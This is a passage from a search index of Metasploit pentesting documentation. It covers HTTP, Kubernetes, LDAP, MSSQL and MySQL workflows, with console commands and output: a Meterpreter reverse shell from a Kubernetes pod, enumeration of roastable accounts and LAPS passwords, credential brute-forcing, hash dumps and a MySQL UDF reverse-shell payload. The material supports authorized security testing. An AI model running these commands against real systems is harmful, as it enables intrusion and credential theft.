msf6 > use scanner/http/title msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 msf6 auxiliary(scanner/http/title) > set HttpTrace true HttpTrace => true msf6 auxiliary(scanner/http/title) > run #################### # Request: #################### GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) #################### # Response: #################### HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.16 Date: Wed, 16 Dec 2020 01:16:32 GMT Content-type: text/html; charset=utf-8 Content-Length: 178 <!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\"><html> <title>Directory listing for /</title> <body> <h2>Directory listing for /</h2> <hr> <ul> </ul> <hr> </body> </html> [+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for / [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/http/title) > . To send all HTTP requests through a proxy, e.g. through Burp Suite: . use auxiliary/scanner/http/title run http://example.com HttpTrace=true verbose=true proxies=HTTP:127.0.0.1:8080 . HTTP Credentials . If the module has no username/password options, for instance to log into an admin portal of a web application etc, then the credentials supplied via an HTTP URI will set the HttpUsername/HttpPassword options for HTTP Basic access Authentication purposes. For instance, in the following module the username/password options will be set whilst the HttpUsername/HttpPassword options will not: . use exploit/unix/http/cacti_filter_sqli_rce Module options (exploit/unix/http/cacti_filter_sqli_rce): Name Current Setting Required Description ---- --------------- -------- ----------- ... Omitted ... 
* PASSWORD admin no Password to login with TARGETURI /cacti/ yes The URI of Cacti * USERNAME user yes User to login with ... Omitted ... check http://admin:[email protected]/cacti/ USERNAME and PASSWORD will be set to 'admin' and 'user' . For the following module, as there are no USERNAME/PASSWORD options, the HttpUsername/HttpPassword options will be chosen instead for HTTP Basic access Authentication purposes . use exploit/multi/http/tomcat_mgr_deploy run http://admin:[email protected]:8888 HttpTrace=true verbose=true lhost=192.168.123.1 . Note that the HttpUsername/HttpPassword may not be present in the options output, but can be found in the advanced module options: . use auxiliary/scanner/http/title advanced Module advanced options (auxiliary/scanner/http/title): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN WORKSTATION yes The domain to use for Windows authentication DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers FingerprintCheck true no Conduct a pre-exploit fingerprint verification HttpClientTimeout no HTTP connection and receive timeout * HttpPassword no The HTTP password to specify for authentication HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers HttpTrace false no Show the raw HTTP requests and responses HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable) HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace * HttpUsername no The HTTP username to specify for authentication SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) ShowProgress true yes Display progress messages during a scan ShowProgressPercent 10 yes The interval in percent that progress should be shown UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 no The User-Agent header to use 
for all requests ) VERBOSE false no Enable detailed status messages WORKSPACE no Specify the workspace for this module . HTTP Multiple-Headers . Additional headers can be set via the HTTPRawHeaders option. A file containing an ERB template will be used to append to the headers section of the HTTP request. An example of an ERB template file is shown below. Header-Name-Here: <%= 'content of header goes here' %> . The following output shows leveraging the scraper scanner module with an additional header stored in additional_headers.txt. msf6 auxiliary(scanner/http/scraper) > cat additional_headers.txt [*] exec: cat additional_headers.txt X-Cookie-Header: <%= 'example-cookie' %> msf6 auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt HTTPRAWHEADERS => additional_headers.txt msf6 auxiliary(scanner/http/scraper) > exploit #################### # Request: #################### GET / HTTP/1.0 Host: 172.16.0.63:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 X-Cookie-Header: example-cookie . ",
    "url": "/docs/pentesting/metasploit-guide-http.html#http-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-http.html#http-workflows"
  },"568": {
    "doc": "HTTP + HTTPS",
    "title": "HTTP + HTTPS",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-http.html",
    "relUrl": "/docs/pentesting/metasploit-guide-http.html"
  },"569": {
    "doc": "Kubernetes",
    "title": "Kubernetes Workflows",
    "content": "Metasploit has modules for both exploitation and enumeration of a Kubernetes cluster. These modules can either run through a compromised docker container, or external to the cluster if the required APIs are accessible: . | modules/auxiliary/cloud/kubernetes/enum_kubernetes | modules/exploit/multi/kubernetes/exec | . In the future there may be more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search kubernetes . Lab Environment . A tutorial for setting up a compromisable Kubernetes cluster can be found here . Kubernetes Enumeration . Metasploit has support for enumerating the Kubernetes API to extract the following information: . | Version - Enumerate Kubernetes service version, git commit, build date, etc | Auth - RBAC permission information, i.e. if the token can create pods, read secrets, etc | Namespaces - Enumerate available namespaces | Pods - Enumerate currently running pods | Secrets - Enumerate secrets, including base64 decoding to highlight noteworthy credentials, and storing loot | . The auxiliary/cloud/kubernetes/enum_kubernetes can be used to pivot through the compromised container to reach an previously inaccessible Kubernetes API. In this scenario the container’s Kubernetes service token will be read from the file system, and used to authenticate with the Kubernetes API: . If you have a Meterpreter session on a compromised Kubernetes container, the module values of NAMESPACE, TOKEN, RHOSTS and RPORT module options will be gathered from the session host automatically. The TOKEN will be read from the mounted /run/secrets/kubernetes.io/serviceaccount/token file if available: . use auxiliary/cloud/kubernetes/enum_kubernetes run session=-1 . If the Kubernetes API is publicly accessible and you have a JWT Token: . 
msf6 > use cloud/kubernetes/enum_kubernetes msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443 RHOST => https://kubernetes.docker.internal:6443 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO... TOKEN => eyJhbGciO... msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run [*] Running module against 127.0.0.1 [+] Kubernetes service version: {\"major\":\"1\",\"minor\":\"21\",\"gitVersion\":\"v1.21.2\",\"gitCommit\":\"092fbfbf53427de67cac1e9fa54aaa09a28371d7\",\"gitTreeState\":\"clean\",\"buildDate\":\"2021-06-16T12:53:14Z\",\"goVersion\":\"go1.16.5\",\"compiler\":\"gc\",\"platform\":\"linux/amd64\"} [+] Enumerating namespaces Namespaces ========== # name - ---- 0 default 1 kube-node-lease 2 kube-public 3 kube-system 4 kubernetes-dashboard ... etc ... By default the run command will enumerate all resources available, but you can also specify which actions you would like to perform: . msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions Auxiliary actions: Name Description ---- ----------- all enumerate all resources auth enumerate auth namespace enumerate namespace namespaces enumerate namespaces pod enumerate pod pods enumerate pods secret enumerate secret secrets enumerate secrets version enumerate version . More usage examples: . # Configuration use cloud/kubernetes/enum_kubernetes set RHOST https://kubernetes.docker.internal:6443 set TOKEN eyJhbGciOiJSUz... # Enumeration, filtering, and displaying information: run namespaces namespaces name=kube-public auth auth output=json secrets pods pod pod namespace=default name=redis-7fd956df5-sbchb pod namespace=default name=redis-7fd956df5-sbchb output=json pod namespace=default name=redis-7fd956df5-sbchb output=table version . Kubernetes Execution . 
The exploit/multi/kubernetes/exec module will attempt to create a new pod in the specified namespace, as well as mounting the host’s filesystem at /host_mnt if the required permissions are available. This module can either use websockets for communication, similar to the kubectl exec --stdin --tty command, or upload a full Meterpreter payload. If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the NAMESPACE, TOKEN, RHOSTS and RPORT module options will be gathered from the session host automatically. The TOKEN will be read from the mounted /run/secrets/kubernetes.io/serviceaccount/token file if available: . msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\\ WebSocket TARGET => Interactive WebSocket msf6 exploit(multi/kubernetes/exec) > run RHOST=\"\" RPORT=\"\" POD=\"\" SESSION=-1 [*] Routing traffic through session: 1 [+] Kubernetes service host: 10.96.0.1:443 [*] Using image: busybox [+] Pod created: burhgvzc [*] Waiting for the pod to be ready... [+] Successfully established the WebSocket [*] Found shell. [*] Command shell session 2 opened (172.17.0.31:59437 -> 10.96.0.1:443) at 2021-10-01 10:05:57 -0400 id uid=0(root) gid=0(root) groups=10(wheel) pwd / . If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the thinkphp-67f7c88cc9-tgpfh pod: . msf6 > use exploit/multi/kubernetes/exec [*] Using configured payload python/meterpreter/reverse_tcp msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1... TOKEN => eyJhbGciOiJSUzI1... 
msf6 exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh POD => thinkphp-67f7c88cc9-tgpfh msf6 exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31 RHOSTS => 192.168.159.31 msf6 exploit(multi/kubernetes/exec) > set TARGET Python TARGET => Python msf6 exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp PAYLOAD => python/meterpreter/reverse_tcp msf6 exploit(multi/kubernetes/exec) > run [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Sending stage (39736 bytes) to 192.168.159.31 [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:59234) at 2021-10-01 09:55:00 -0400 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : thinkphp-67f7c88cc9-tgpfh OS : Linux 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 Architecture : x64 Meterpreter : python/linux meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/kubernetes/exec) > . ",
    "url": "/docs/pentesting/metasploit-guide-kubernetes.html#kubernetes-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-kubernetes.html#kubernetes-workflows"
  },"570": {
    "doc": "Kubernetes",
    "title": "Kubernetes",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-kubernetes.html",
    "relUrl": "/docs/pentesting/metasploit-guide-kubernetes.html"
  },"571": {
    "doc": "LDAP",
    "title": "LDAP Workflows",
    "content": "Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service. For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc. LDAP on Windows environments are found on: . | 389/TCP - LDAP | 636/TCP - LDAPS | 3268 - Global Catalog LDAP | 3269 - Global Catalog LDAPS | . Lab Environment . LDAP support is enabled by default on a Windows environment when you install Active Directory. For LDAPS support to be enabled on port 636, you will have to configure AD CS (Active Directory Certificate Services) . Authentication . The LDAP module supports the following forms of authentication with the LDAP::Auth option: . | auto | ntlm | kerberos - Example below | plaintext | none | . LDAP Enumeration . The auxiliary/gather/ldap_query.rb module can be used for querying LDAP: . use auxiliary/gather/ldap_query run rhost=192.168.123.13 [email protected] password=p4$$w0rd action=ENUM_ACCOUNTS . Example output: . 
msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 [email protected] password=p4$$w0rd action=ENUM_ACCOUNTS [*] Running module against 192.168.123.13 [*] Discovering base DN automatically [+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local CN=Administrator CN=Users DC=domain DC=local ========================================== Name Attributes ---- ---------- badpwdcount 0 description Built-in account for administering the computer/domain lastlogoff 1601-01-01 00:00:00 UTC lastlogon 2023-01-23 11:02:49 UTC logoncount 159 memberof CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Administrators,CN=Builtin,DC=domain,DC=local name Administrator objectsid S-1-5-21-3402587289-1488798532-3618296993-500 pwdlastset 133189448681297271 samaccountname Administrator useraccountcontrol 512 ... etc ... This module has a selection of inbuilt queries which can be configured via the action setting to make enumeration easier: . | ENUM_ACCOUNTS - Dump info about all known user accounts in the domain. | ENUM_AD_CS_CAS - Enumerate AD CS certificate authorities. | ENUM_AD_CS_CERT_TEMPLATES - Enumerate AD CS certificate templates. | ENUM_ADMIN_OBJECTS - Dump info about all objects with protected ACLs (i.e. highly privileged objects). | ENUM_ALL_OBJECT_CATEGORY - Dump all objects containing any objectCategory field. | ENUM_ALL_OBJECT_CLASS - Dump all objects containing any objectClass field. | ENUM_COMPUTERS - Dump all objects containing an objectCategory or objectClass of Computer. | ENUM_CONSTRAINED_DELEGATION - Dump info about all known objects that allow constrained delegation. | ENUM_DNS_RECORDS - Dump info about DNS records the server knows about using the dnsNode object class. 
| ENUM_DNS_ZONES - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed, as without this BASEDN prefix we often miss certain entries. | ENUM_DOMAIN - Dump info about the Active Directory domain. | ENUM_DOMAIN_CONTROLLERS - Dump all known domain controllers. | ENUM_EXCHANGE_RECIPIENTS - Dump info about all known Exchange recipients. | ENUM_EXCHANGE_SERVERS - Dump info about all known Exchange servers. | ENUM_GMSA_HASHES - Dump info about GMSAs and their password hashes if available. | ENUM_GROUPS - Dump info about all known groups in the LDAP environment. | ENUM_GROUP_POLICY_OBJECTS - Dump info about all known Group Policy Objects (GPOs) in the LDAP environment. | ENUM_HOSTNAMES - Dump info about all known hostnames in the LDAP environment. | ENUM_LAPS_PASSWORDS - Dump info about computers that have LAPS enabled, and passwords for them if available. | ENUM_LDAP_SERVER_METADATA - Dump metadata about the setup of the domain. | ENUM_MACHINE_ACCOUNT_QUOTA - Dump the number of computer accounts a user is allowed to create in a domain. | ENUM_ORGROLES - Dump info about all known organization roles in the LDAP environment. | ENUM_ORGUNITS - Dump info about all known organizational units in the LDAP environment. | ENUM_UNCONSTRAINED_DELEGATION - Dump info about all known objects that allow unconstrained delegation. | ENUM_USER_ACCOUNT_DISABLED - Dump info about disabled user accounts. | ENUM_USER_ACCOUNT_LOCKED_OUT - Dump info about locked out user accounts. | ENUM_USER_ASREP_ROASTABLE - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable. | ENUM_USER_PASSWORD_NEVER_EXPIRES - Dump info about all users whose password never expires. | ENUM_USER_PASSWORD_NOT_REQUIRED - Dump info about all users whose password never expires and whose account is still enabled. 
| ENUM_USER_SPNS_KERBEROAST - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting. | . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Query LDAP for accounts: . msf6 > use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13 [*] Running module against 192.168.123.13 [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [*] Discovering base DN automatically [+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local CN=Administrator CN=Users DC=domain DC=local ============================================ Name Attributes ---- ---------- badpwdcount 0 pwdlastset 133184302034979121 samaccountname Administrator useraccountcontrol 512 ... etc ... ",
    "url": "/docs/pentesting/metasploit-guide-ldap.html#ldap-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-ldap.html#ldap-workflows"
  },"572": {
    "doc": "LDAP",
    "title": "LDAP",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-ldap.html",
    "relUrl": "/docs/pentesting/metasploit-guide-ldap.html"
  },"573": {
    "doc": "MSSQL",
    "title": "MSSQL Workflows",
    "content": "Microsoft SQL Server (MSSQL) is a relational database management system. Commonly used in conjunction with web applications and other software that need to persist data. MSSQL is a useful target for data extraction and code execution. MSSQL is frequently found on port on the following ports: . | 1433/TCP | 1434/UDP | . For a full list of MSSQL modules run the search command within msfconsole: . msf6 &amp;gt; search mssql . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:mssql . Lab Environment . Environment setup: . | Either follow Microsoft’s SQL Server installation guide or use chocolatey package manager | Enable TCP access within the SQL Server Configuration Manager | Optional: Microsoft’s sqlcmd utility can be installed separately for querying the database from your host machine | Optional: Configure Windows firewall to allow MSSQL server access | . MSSQL Enumeration . Running queries . use auxiliary/admin/mssql/mssql_sql run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid' . Logging in and obtaining a session . To log in or obtain an interactive session on an MSSQL instance running on the target, use mssql_login . use auxiliary/scanner/mssql_login run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password . The CreateSession option, when set to true, will result in returning an interactive MSSQL session with the target machine on a successful login: . [*] 192.168.2.242:1433 - 192.168.2.242:1433 - MSSQL - Starting authentication scanner. [!] 192.168.2.242:1433 - No active DB -- Credential data will not be saved! 
[+] 192.168.2.242:1433 - 192.168.2.242:1433 - Login Successful: WORKSTATION\\user:password [*] MSSQL session 1 opened (192.168.2.1:60963 -&amp;gt; 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500 [*] 192.168.2.242:1433 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . Which you can interact with using sessions -i &amp;lt;session id&amp;gt; or sessions -i -1 to interact with the most recently opened session. msf6 auxiliary(scanner/mssql/mssql_login) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 mssql MSSQL test @ 192.168.2.242:1433 192.168.2.1:60963 -&amp;gt; 192.168.23.242:1433 (192.168.2.242) msf6 auxiliary(scanner/mssql/mssql_login) &amp;gt; sessions -i 1 [*] Starting interaction with 1... mssql @ 192.168.2.242:1433 (master) &amp;gt; query 'select @@version;' Response ======== # NULL - ---- 0 Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) Oct 8 2022 05:58:25 Copyright (C) 2022 Microsoft Corporation Developer Edition (64-bit) on Windows Server 2022 Stand ard 10.0 &amp;lt;X64&amp;gt; (Build 20348: ) (Hypervisor) . When interacting with a session, the help command can be useful: . mssql @ 192.168.2.242:1433 (master) &amp;gt; help Core Commands ============= Command Description ------- ----------- ? 
Help menu background Backgrounds the current session bg Alias for background exit Terminate the PostgreSQL session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session MSSQL Client Commands ===================== Command Description ------- ----------- query Run a single SQL query query_interactive Enter an interactive prompt for running multiple SQL queries Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/mssql/mssql_enum auxiliary/admin/mssql/mssql_escalate_dbowner auxiliary/admin/mssql/mssql_escalate_execute_as auxiliary/admin/mssql/mssql_exec auxiliary/admin/mssql/mssql_findandsampledata auxiliary/admin/mssql/mssql_idf auxiliary/admin/mssql/mssql_sql auxiliary/admin/mssql/mssql_sql_file auxiliary/scanner/mssql/mssql_hashdump auxiliary/scanner/mssql/mssql_schemadump exploit/windows/mssql/mssql_payload . To interact directly with the session as if in a SQL prompt, you can use the query command. msf6 auxiliary(scanner/mssql/mssql_login) &amp;gt; sessions -i -1 [*] Starting interaction with 2... mssql @ 192.168.2.242:1433 (master) &amp;gt; query -h Usage: query Run a single SQL query on the target. OPTIONS: -h, --help Help menu. 
-i, --interact Enter an interactive prompt for running multiple SQL queries Examples: query select @@version; query select user_name(); query select name from master.dbo.sysdatabases; mssql @ 192.168.2.242:1433 (master) &amp;gt; query 'select @@version;' Response ======== # NULL - ---- 0 Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) Oct 8 2022 05:58:25 Copyright (C) 2022 Microsoft Corporation Developer Edition (64-bit) on Windows Server 2022 Standard 10.0 &amp;lt;X64&amp;gt; (B uild 20348: ) (Hypervisor) . Alternatively you can enter a SQL prompt via the query_interactive command which supports multiline commands: . mssql @ 192.168.2.242:1433 (master) &amp;gt; query_interactive -h Usage: query_interactive Go into an interactive SQL shell where SQL queries can be executed. To exit, type 'exit', 'quit', 'end' or 'stop'. mssql @ 192.168.2.242:1433 (master) &amp;gt; query_interactive [*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master) [*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit. SQL &amp;gt;&amp;gt; select * SQL *&amp;gt; from information_schema.tables SQL *&amp;gt; where table_type = 'BASE TABLE'; [*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE'; Response ======== # TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE - ------------- ------------ ---------- ---------- 0 master dbo spt_fallback_db BASE TABLE 1 master dbo spt_fallback_dev BASE TABLE 2 master dbo spt_fallback_usg BASE TABLE 4 master dbo Users BASE TABLE 5 master dbo spt_monitor BASE TABLE 6 master dbo MSreplication_options BASE TABLE SQL &amp;gt;&amp;gt; . Link crawling . Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances: . use windows/mssql/mssql_linkcrawler run rhost=192.168.123.13 username=administrator password=p4$$w0rd . Kerberos Authentication . 
Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Connect to a Microsoft SQL Server instance and run a query: . msf6 &amp;gt; use auxiliary/admin/mssql/mssql_sql msf6 auxiliary(admin/mssql/mssql_sql) &amp;gt; run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid' [*] Reloading module... [*] Running module against 192.168.123.13 [*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response [+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response [*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin [*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid [*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193) auth_scheme ----------- KERBEROS [*] Auxiliary module execution completed . ",
    "url": "/docs/pentesting/metasploit-guide-mssql.html#mssql-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-mssql.html#mssql-workflows"
  },"574": {
    "doc": "MSSQL",
    "title": "MSSQL",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-mssql.html",
    "relUrl": "/docs/pentesting/metasploit-guide-mssql.html"
  },"575": {
    "doc": "MySQL",
    "title": "MySQL",
    "content": "MySQL is frequently found on port 3306/TCP. It is an open-source relational database management system. Metasploit has support for multiple MySQL modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Dumping database information | Executing arbitrary SQL queries against the database | Gaining reverse shells | . There are more modules than listed here; for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search mysql . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:mysql . Lab Environment . When testing in a lab environment MySQL can either be installed on the host machine or within Docker: . docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest . MySQL Enumeration . Enumerate version: . use auxiliary/scanner/mysql/mysql_version run mysql://127.0.0.1 . MySQL Login / Bruteforce . If you have MySQL credentials to validate: . use auxiliary/scanner/mysql/mysql_login run 'mysql://root: a b c [email protected]' . Re-using MySQL credentials in a subnet: . use auxiliary/scanner/mysql/mysql_login run cidr:/24:mysql://user:[email protected] threads=50 . Using an alternative port: . use auxiliary/scanner/mysql/mysql_login run mysql://user:[email protected]:2222 . Brute-force host with known user and password list: . use auxiliary/scanner/mysql/mysql_login run mysql://[email protected] threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use auxiliary/scanner/mysql/mysql_login run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use auxiliary/scanner/mysql/mysql_login run cidr:/24:mysql://user:[email protected] threads=50 run cidr:/24:mysql://[email protected] threads=50 pass_file=./wordlist.txt . Obtaining an Interactive Session on the Target . 
The CreateSession option in auxiliary/scanner/mysql/mysql_login allows you to obtain an interactive session for the MySQL client you’re connecting to. The run command with CreateSession set to true should give you an interactive session: . msf6 &amp;gt; use scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true [+] 127.0.0.1:4306 - 127.0.0.1:4306 - Found remote MySQL version 11.2.2 [+] 127.0.0.1:4306 - 127.0.0.1:4306 - Success: 'root:password' [*] MySQL session 1 opened (127.0.0.1:53241 -&amp;gt; 127.0.0.1:4306) at 2024-03-12 12:40:46 -0500 [*] 127.0.0.1:4306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... mysql @ 127.0.0.1:4306 &amp;gt; . You can interact with your new session using sessions -i -1 or sessions &amp;lt;session id&amp;gt;. You can also use help to get more information about how to use your session. msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 mssql MSSQL test @ 192.168.2.242:1433 192.168.2.1:61428 -&amp;gt; 192.168.2.242:1433 (192.168.2.242) 3 mysql MySQL root @ 127.0.0.1:4306 127.0.0.1:61450 -&amp;gt; 127.0.0.1:4306 (127.0.0.1) msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; sessions -i 3 [*] Starting interaction with 3... When interacting with a session, the help command can be useful: . mysql @ 127.0.0.1:4306 &amp;gt; help Core Commands ============= Command Description ------- ----------- ? 
Help menu background Backgrounds the current session bg Alias for background exit Terminate the PostgreSQL session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session MySQL Client Commands ===================== Command Description ------- ----------- query Run a single SQL query query_interactive Enter an interactive prompt for running multiple SQL queries Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/mysql/mysql_enum auxiliary/admin/mysql/mysql_sql auxiliary/scanner/mysql/mysql_file_enum auxiliary/scanner/mysql/mysql_hashdump auxiliary/scanner/mysql/mysql_schemadump auxiliary/scanner/mysql/mysql_version auxiliary/scanner/mysql/mysql_writable_dirs exploit/multi/mysql/mysql_udf_payload exploit/windows/mysql/mysql_mof exploit/windows/mysql/mysql_start_up . Once you’ve done that, you can run any MySQL query against the target using the query command: . mysql @ 127.0.0.1:4306 &amp;gt; query -h Usage: query Run a single SQL query on the target. OPTIONS: -h, --help Help menu. -i, --interact Enter an interactive prompt for running multiple SQL queries Examples: query SHOW DATABASES; query USE information_schema; query SELECT * FROM SQL_FUNCTIONS; query SELECT version(); mysql @ 127.0.0.1:4306 &amp;gt; query 'SELECT version();' Response ======== # version() - --------- 0 11.2.2-MariaDB-1:11.2.2+maria~ubu2204 . Alternatively you can enter a SQL prompt via the query_interactive command which supports multiline commands: . 
mysql @ 127.0.0.1:4306 () &amp;gt; query_interactive -h Usage: query_interactive Go into an interactive SQL shell where SQL queries can be executed. To exit, type 'exit', 'quit', 'end' or 'stop'. mysql @ 127.0.0.1:4306 () &amp;gt; query_interactive [*] Starting interactive SQL shell for mysql @ 127.0.0.1:4306 () [*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit. SQL &amp;gt;&amp;gt; SELECT table_name SQL *&amp;gt; FROM information_schema.tables SQL *&amp;gt; LIMIT 2; [*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2; Response ======== # table_name - ---------- 0 ALL_PLUGINS 1 APPLICABLE_ROLES SQL &amp;gt;&amp;gt; . MySQL Dumping . User and hash dump: . use auxiliary/scanner/mysql/mysql_hashdump run 'mysql://root: a b c [email protected]' . Schema dump: . use auxiliary/scanner/mysql/mysql_schemadump run 'mysql://root: a b c [email protected]' . MySQL Querying . Execute raw SQL: . use admin/mysql/mysql_sql run 'mysql://root: a b c [email protected]' sql='select version()' . MySQL Reverse Shell . The mysql_udf_payload module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=&amp;lt; 5.5.9), directory write permissions are not enforced, and the MySQL service runs as LocalSystem. For this to work successfully: . | secure_file_priv, a MySQL setting, must be changed from the default to allow writing to MySQL’s plugins folder | On Ubuntu, apparmor needs a number of exceptions added, or to be disabled. Equivalents on other Linux systems most likely need the same | The MySQL plugin folder must be writable | . NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. Usage: . 
use multi/mysql/mysql_udf_payload run 'mysql://root: a b c [email protected]' lhost=192.168.123.1 target=Linux payload=linux/x86/meterpreter/reverse_tcp . ",
    "url": "/docs/pentesting/metasploit-guide-mysql.html",
    "relUrl": "/docs/pentesting/metasploit-guide-mysql.html"
  },"576": {
    "doc": "Post Gather Modules",
    "title": "Post Modules",
